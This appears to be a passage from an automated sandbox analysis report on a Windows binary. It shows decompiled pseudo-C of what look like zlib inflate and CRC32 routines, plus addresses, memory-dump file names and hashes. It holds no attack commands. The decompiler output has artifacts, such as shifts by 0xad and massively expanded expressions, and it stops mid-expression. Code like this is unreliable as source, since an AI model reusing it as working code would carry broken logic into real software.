				_t221 =  *((intOrPtr*)(_t349 + 0x50));
				_t153 =  *((intOrPtr*)(_t221 + 0x1c));
				_t217 =  *(_t153 + 0x38);
				_t337 =  *_t221 - 1;
				 *((intOrPtr*)(_t349 + 0x14)) =  *((intOrPtr*)(_t221 + 4)) + _t337 - 5;
				_t222 =  *((intOrPtr*)(_t221 + 0x10));
				_t331 =  *((intOrPtr*)(_t221 + 0xc)) - 1;
				 *((intOrPtr*)(_t349 + 0x38)) = _t222 -  *(_t349 + 0x54) + _t331;
				 *((intOrPtr*)(_t349 + 0x2c)) = _t222 + _t331 - 0x101;
				 *((intOrPtr*)(_t349 + 0x28)) =  *((intOrPtr*)(_t153 + 0x28));
				 *((intOrPtr*)(_t349 + 0x3c)) =  *((intOrPtr*)(_t153 + 0x2c));
				 *((intOrPtr*)(_t349 + 0x44)) =  *((intOrPtr*)(_t153 + 0x30));
				 *((intOrPtr*)(_t349 + 0x40)) =  *((intOrPtr*)(_t153 + 0x34));
				 *((intOrPtr*)(_t349 + 0x20)) =  *((intOrPtr*)(_t153 + 0x4c));
				 *((intOrPtr*)(_t349 + 0x24)) =  *((intOrPtr*)(_t153 + 0x50));
				 *((intOrPtr*)(_t349 + 0x18)) = _t153;
				_t326 =  *(_t153 + 0x3c);
				 *(_t349 + 0x54) = 1;
				_t280 = (1 <<  *(_t153 + 0x54)) - 1;
				 *(_t349 + 0x10) = _t337;
				 *(_t349 + 0x48) = 1;
				 *(_t349 + 0x30) = ( *(_t349 + 0x54) <<  *(_t153 + 0x58)) - 1;
				L1:
				while(1) {
					if(_t326 < 0xf) {
						_t174 = (_t337[1] & 0x000000ff) << _t326;
						_t337 =  &(_t337[2]);
						_t329 = _t326 + 8;
						 *(_t349 + 0x10) = _t337;
						_t217 = _t217 + _t174 + (( *_t337 & 0x000000ff) << _t329);
						_t326 = _t329 + 8;
					}
					_t157 =  *( *((intOrPtr*)(_t349 + 0x20)) + (_t280 & _t217) * 4);
					_t230 = _t157 >> 0x00000008 & 0x000000ff;
					_t284 = _t157 & 0x000000ff;
					_t217 = _t217 >> _t230;
					_t326 = _t326 - _t230;
					if(_t284 == 0) {
						L7:
						_t331 = _t331 + 1;
						 *_t331 = _t157 >> 0x10;
						L46:
						_t285 =  *((intOrPtr*)(_t349 + 0x14));
						if(_t337 >= _t285 || _t331 >=  *((intOrPtr*)(_t349 + 0x2c))) {
							L59:
							_t160 = _t326 >> 3;
							_t338 = _t337 - _t160;
							_t327 = _t326 - _t160 + _t160 + _t160 + _t160 + _t160 + _t160 + _t160 + _t160;
							_t232 =  *((intOrPtr*)(_t349 + 0x50));
							_t144 = _t338 + 1; // -1
							 *_t232 = _t144;
							 *((intOrPtr*)(_t232 + 0xc)) = _t331 + 1;
							 *((intOrPtr*)(_t232 + 0x10)) =  *((intOrPtr*)(_t349 + 0x2c)) - _t331 + 0x101;
							_t172 =  *((intOrPtr*)(_t349 + 0x18));
							 *((intOrPtr*)(_t232 + 4)) = _t285 - _t337 - _t160 + 5;
							 *(_t172 + 0x3c) = _t327;
							 *(_t172 + 0x38) = _t217 & (0x00000001 << _t327) - 0x00000001;
							return _t172;
						} else {
							_t280 =  *(_t349 + 0x48);
							continue;
						}
					}
					while((_t284 & 0x00000010) == 0) {
						if((_t284 & 0x00000040) != 0) {
							if((_t284 & 0x00000020) == 0) {
								L57:
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + 0x18)) = 0x41d338;
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0x1b;
								L58:
								_t285 =  *((intOrPtr*)(_t349 + 0x14));
								goto L59;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0xb;
							goto L58;
						}
						 *(_t349 + 0x54) = 1;
						_t157 =  *( *((intOrPtr*)(_t349 + 0x20)) + ((( *(_t349 + 0x54) << _t284) - 0x00000001 & _t217) + (_t157 >> 0x10)) * 4);
						_t269 = _t157 >> 0x00000008 & 0x000000ff;
						_t284 = _t157 & 0x000000ff;
						_t217 = _t217 >> _t269;
						_t326 = _t326 - _t269;
						if(_t284 != 0) {
							continue;
						}
						goto L7;
					}
					_t288 = _t284 & 0x0000000f;
					 *(_t349 + 0x54) = _t157 >> 0x10;
					if(_t288 != 0) {
						_t263 = _t288;
						 *(_t349 + 0x54) =  *(_t349 + 0x54) + ((0x00000001 << _t263) - 0x00000001 & _t217);
						_t217 = _t217 >> _t263;
						_t326 = _t326 - _t288;
					}
					if(_t326 < 0xf) {
						_t318 = _t337[1] & 0x000000ff;
						_t348 =  &(_t337[1]);
						_t337 =  &(_t348[1]);
						_t328 = _t326 + 8;
						 *(_t349 + 0x10) = _t337;
						_t217 = _t217 + (_t318 << _t326) + ((_t348[1] & 0x000000ff) << _t328);
						_t326 = _t328 + 8;
					}
					_t290 =  *( *((intOrPtr*)(_t349 + 0x24)) + ( *(_t349 + 0x30) & _t217) * 4);
					_t237 = _t290 >> 0x00000008 & 0x000000ff;
					_t180 = _t290 & 0x000000ff;
					_t217 = _t217 >> _t237;
					_t326 = _t326 - _t237;
					 *(_t349 + 0x1c) = _t290;
					if((_t180 & 0x00000010) != 0) {
						L17:
						_t181 = _t180 & 0x0000000f;
						 *(_t349 + 0x1c) = _t290 >> 0x10;
						if(_t326 < _t181) {
							_t309 = _t337[1] & 0x000000ff;
							_t337 =  &(_t337[1]);
							_t310 = _t309 << _t326;
							_t326 = _t326 + 8;
							 *(_t349 + 0x10) = _t337;
							_t217 = _t217 + _t310;
							if(_t326 < _t181) {
								_t311 = _t337[1] & 0x000000ff;
								_t337 =  &(_t337[1]);
								 *(_t349 + 0x10) = _t337;
								_t217 = _t217 + (_t311 << _t326);
								_t326 = _t326 + 8;
							}
						}
						_t326 = _t326 - _t181;
						_t297 =  *(_t349 + 0x1c) + ((0x00000001 << _t181) - 0x00000001 & _t217);
						_t183 = _t331 -  *((intOrPtr*)(_t349 + 0x38));
						_t217 = _t217 >> _t181;
						 *(_t349 + 0x1c) = _t297;
						if(_t297 <= _t183) {
							_t185 = _t331 - _t297;
							do {
								_t186 = _t185 + 1;
								 *((char*)(_t331 + 1)) =  *(_t185 + 1) & 0x000000ff;
								_t187 = _t186 + 1;
								_t333 = _t331 + 2;
								 *_t333 =  *((intOrPtr*)(_t186 + 1));
								_t185 = _t187 + 1;
								_t331 = _t333 + 1;
								 *_t331 =  *(_t187 + 1) & 0x000000ff;
								_t245 =  *(_t349 + 0x54) - 3;
								 *(_t349 + 0x54) = _t245;
							} while (_t245 > 2);
							if(_t245 != 0) {
								_t188 = _t185 + 1;
								_t331 = _t331 + 1;
								 *_t331 =  *(_t185 + 1);
								if(_t245 > 1) {
									_t331 = _t331 + 1;
									 *_t331 =  *((intOrPtr*)(_t188 + 1));
								}
							}
							goto L46;
						} else {
							_t341 = _t297 - _t183;
							if(_t341 >  *((intOrPtr*)(_t349 + 0x3c))) {
								_t337 =  *(_t349 + 0x10);
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + 0x18)) = 0x41d338;
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0x1b;
								goto L58;
							}
							_t190 =  *((intOrPtr*)(_t349 + 0x44));
							_t248 =  *((intOrPtr*)(_t349 + 0x40)) - 1;
							 *((intOrPtr*)(_t349 + 0x34)) = _t248;
							if(_t190 != 0) {
								if(_t190 >= _t341) {
									_t249 = _t248 + _t190 - _t341;
									if(_t341 >=  *(_t349 + 0x54)) {
										L39:
										_t192 =  *(_t349 + 0x54);
										if(_t192 <= 2) {
											L42:
											_t342 =  *(_t349 + 0x54);
											if(_t342 != 0) {
												_t250 = _t249 + 1;
												_t331 = _t331 + 1;
												 *_t331 =  *(_t249 + 1);
												if(_t342 > 1) {
													_t331 = _t331 + 1;
													 *_t331 =  *((intOrPtr*)(_t250 + 1));
												}
											}
											_t337 =  *(_t349 + 0x10);
											goto L46;
										}
										_t107 = _t192 - 3; // -2
										_t345 = (0xaaaaaaab * _t107 >> 0x20 >> 1) + 1;
										do {
											 *(_t349 + 0x54) =  *(_t349 + 0x54) - 3;
											_t251 = _t249 + 1;
											_t334 = _t331 + 1;
											 *_t334 =  *(_t249 + 1) & 0x000000ff;
											_t252 = _t251 + 1;
											_t335 = _t334 + 1;
											 *_t335 =  *((intOrPtr*)(_t251 + 1));
											_t249 = _t252 + 1;
											_t331 = _t335 + 1;
											_t345 = _t345 - 1;
											 *_t331 =  *(_t252 + 1) & 0x000000ff;
										} while (_t345 != 0);
										goto L42;
									}
									 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t341;
									do {
										_t198 =  *(_t249 + 1);
										_t249 = _t249 + 1;
										_t331 = _t331 + 1;
										_t341 = _t341 - 1;
										 *_t331 = _t198;
									} while (_t341 != 0);
									L38:
									_t249 = _t331 - _t297;
									goto L39;
								}
								_t346 = _t341 - _t190;
								_t249 = _t248 + _t190 - _t341 +  *((intOrPtr*)(_t349 + 0x28));
								if(_t346 >=  *(_t349 + 0x54)) {
									goto L39;
								}
								 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t346;
								do {
									_t308 =  *(_t249 + 1);
									_t249 = _t249 + 1;
									_t331 = _t331 + 1;
									_t346 = _t346 - 1;
									 *_t331 = _t308;
								} while (_t346 != 0);
								_t249 =  *((intOrPtr*)(_t349 + 0x34));
								if(_t190 >=  *(_t349 + 0x54)) {
									goto L39;
								}
								 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t190;
								_t347 = _t190;
								do {
									_t199 =  *(_t249 + 1);
									_t249 = _t249 + 1;
									_t331 = _t331 + 1;
									_t347 = _t347 - 1;
									 *_t331 = _t199;
								} while (_t347 != 0);
								_t249 = _t331 -  *(_t349 + 0x1c);
								goto L39;
							}
							_t249 = _t248 +  *((intOrPtr*)(_t349 + 0x28)) - _t341;
							if(_t341 >=  *(_t349 + 0x54)) {
								goto L39;
							}
							 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t341;
							do {
								_t202 =  *(_t249 + 1);
								_t249 = _t249 + 1;
								_t331 = _t331 + 1;
								_t341 = _t341 - 1;
								 *_t331 = _t202;
							} while (_t341 != 0);
							goto L38;
						}
					} else {
						while((_t180 & 0x00000040) == 0) {
							_t290 =  *( *((intOrPtr*)(_t349 + 0x24)) + (((0x00000001 << _t180) - 0x00000001 & _t217) + ( *(_t349 + 0x1e) & 0x0000ffff)) * 4);
							_t180 = _t290 & 0x000000ff;
							_t217 = _t217 >> 0xad;
							_t326 = _t326 - 0xad;
							 *(_t349 + 0x1c) = 1;
							if((_t180 & 0x00000010) == 0) {
								continue;
							}
							goto L17;
						}
						goto L57;
					}
				}
			}

0x00406ca7
0x00406cab
0x00406cb1
0x00406cb6
0x00406cbb
0x00406cc2
0x00406ccb
0x00406cd5
0x00406cdc
0x00406ce3
0x00406cea
0x00406cf1
0x00406cf8
0x00406cff
0x00406d03
0x00406d14
0x00406d18
0x00406d1b
0x00406d29
0x00406d2a
0x00406d2e
0x00406d33
0x00000000
0x00406d37
0x00406d3a
0x00406d43
0x00406d45
0x00406d46
0x00406d53
0x00406d57
0x00406d59
0x00406d59
0x00406d62
0x00406d6a
0x00406d6d
0x00406d70
0x00406d72
0x00406d76
0x00406db9
0x00406db9
0x00406dbd
0x00406fef
0x00406fef
0x00406ff5
0x00407097
0x00407099
0x0040709c
0x004070a4
0x004070af
0x004070bb
0x004070be
0x004070c3
0x004070d1
0x004070d4
0x004070d8
0x004070db
0x004070e1
0x004070e8
0x00407005
0x00407005
0x00000000
0x00407005
0x00406ff5
0x00406d78
0x00406d80
0x00407070
0x0040707e
0x00407086
0x0040708d
0x00407093
0x00407093
0x00000000
0x00407093
0x00407076
0x00000000
0x00407076
0x00406d8b
0x00406da3
0x00406dab
0x00406dae
0x00406db1
0x00406db3
0x00406db7
0x00000000
0x00000000
0x00000000
0x00406db7
0x00406dc7
0x00406dca
0x00406dce
0x00406de6
0x00406df2
0x00406df6
0x00406df8
0x00406df8
0x00406dfd
0x00406dff
0x00406e03
0x00406e0a
0x00406e0d
0x00406e16
0x00406e1a
0x00406e1c
0x00406e1c
0x00406e29
0x00406e31
0x00406e34
0x00406e37
0x00406e39
0x00406e3b
0x00406e41
0x00406e7c
0x00406e7f
0x00406e82
0x00406e88
0x00406e8a
0x00406e8e
0x00406e91
0x00406e93
0x00406e96
0x00406e9a
0x00406e9e
0x00406ea0
0x00406ea4
0x00406ea9
0x00406ead
0x00406eaf
0x00406eaf
0x00406e9e
0x00406ebd
0x00406ec8
0x00406ece
0x00406ed2
0x00406ed4
0x00406eda
0x00407010
0x00407012
0x00407016
0x00407017
0x0040701e
0x0040701f
0x00407020
0x00407026
0x00407027
0x00407028
0x0040702e
0x00407031
0x00407035
0x0040703c
0x00407041
0x00407042
0x00407043
0x00407048
0x0040704d
0x0040704e
0x0040704e
0x00407048
0x00000000
0x00406ee0
0x00406ee2
0x00406ee8
0x0040705a
0x0040705e
0x00407065
0x00000000
0x00407065
0x00406ef2
0x00406ef6
0x00406ef7
0x00406efd
0x00406f25
0x00406f76
0x00406f7c
0x00406f92
0x00406f92
0x00406f99
0x00406fd1
0x00406fd1
0x00406fd7
0x00406fdc
0x00406fdd
0x00406fde
0x00406fe3
0x00406fe8
0x00406fe9
0x00406fe9
0x00406fe3
0x00406feb
0x00000000
0x00406feb
0x00406f9b
0x00406fa9
0x00406fb0
0x00406fb4
0x00406fb9
0x00406fba
0x00406fbb
0x00406fc0
0x00406fc1
0x00406fc2
0x00406fc8
0x00406fc9
0x00406fca
0x00406fcd
0x00406fcd
0x00000000
0x00406fb0
0x00406f7e
0x00406f82
0x00406f82
0x00406f85
0x00406f86
0x00406f87
0x00406f8a
0x00406f8a
0x00406f8e
0x00406f90
0x00000000
0x00406f90
0x00406f2f
0x00406f31
0x00406f37
0x00000000
0x00000000
0x00406f39
0x00406f40
0x00406f40
0x00406f43
0x00406f44
0x00406f45
0x00406f48
0x00406f48
0x00406f4c
0x00406f54
0x00000000
0x00000000
0x00406f56
0x00406f5a
0x00406f60
0x00406f60
0x00406f63
0x00406f64
0x00406f65
0x00406f68
0x00406f68
0x00406f6e
0x00000000
0x00406f6e
0x00406f05
0x00406f0b
0x00000000
0x00000000
0x00406f11
0x00406f15
0x00406f15
0x00406f18
0x00406f19
0x00406f1a
0x00406f1d
0x00406f1d
0x00000000
0x00406f21
0x00406e43
0x00406e43
0x00406e62
0x00406e6d
0x00406e70
0x00406e72
0x00406e74
0x00406e7a
0x00000000
0x00000000
0x00000000
0x00406e7a
0x00000000
0x00406e43
0x00406e41

Memory Dump Source

Source File: 00000001.00000002.269403070.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.269395499.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269422618.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.269432922.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269440776.0000000000426000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.269448892.0000000000439000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55

Uniqueness

Uniqueness Score: -1.00%

Function 00402B90, Relevance: .2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00402B90(unsigned int __eax, signed char __ecx, unsigned int __edx) {
				signed int* _t89;
				signed char* _t90;
				signed int* _t98;
				signed int* _t100;
				signed int* _t102;
				signed int* _t103;
				signed char _t154;
				unsigned int _t164;
				signed int _t190;
				signed int _t208;
				signed int _t212;
				unsigned int _t264;
				unsigned int _t266;

				_t154 = __ecx;
				_t266 = __edx;
				_t208 =  !(((__eax & 0x0000ff00) + (__eax << 0x10) << 8) + (__eax >> 0x00000008 & 0x0000ff00) + (__eax >> 0x18));
				if(__edx != 0) {
					while((_t154 & 0x00000003) != 0) {
						_t208 = _t208 << 0x00000008 ^  *(0x41c2b0 + (_t208 >> 0x00000018 ^  *_t154 & 0x000000ff) * 4);
						_t154 = _t154 + 1;
						_t266 = _t266 - 1;
						if(_t266 != 0) {
							continue;
						}
						goto L4;
					}
				}
				L4:
				_t89 = _t154 - 4;
				if(_t266 >= 0x20) {
					_t264 = _t266 >> 5;
					do {
						_t214 = _t208 ^ _t89[1];
						_t98 =  &(_t89[2]);
						_t172 =  *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98;
						_t100 =  &(_t98[2]);
						_t223 =  *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4);
						_t102 =  &(_t100[2]);
						_t181 =  *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8);
						_t103 =  &(_t102[1]);
						_t190 =  *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t181 >> 0x18) * 4) ^  *(0x41c2b0 + (_t181 & 0x000000ff) * 4) ^  *(_t103 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t223 >> 0x18) * 4) ^  *(0x41c2b0 + (_t223 & 0x000000ff) * 4) ^  *(_t102 - 8)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + (( *(0x41cab0 + ((_t208 ^ _t89[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x41c6b0 + ((_t208 ^ _t89[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t214 >> 0x18) * 4) ^  *(0x41c2b0 + (_t214 & 0x000000ff) * 4) ^  *_t98) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x41ceb0 + (_t172 >> 0x18) * 4) ^  *(0x41c2b0 + (_t172 & 0x000000ff) * 4) ^  *(_t100 - 4)) >> 0x00000008 & 0x000000ff) * 4) ^  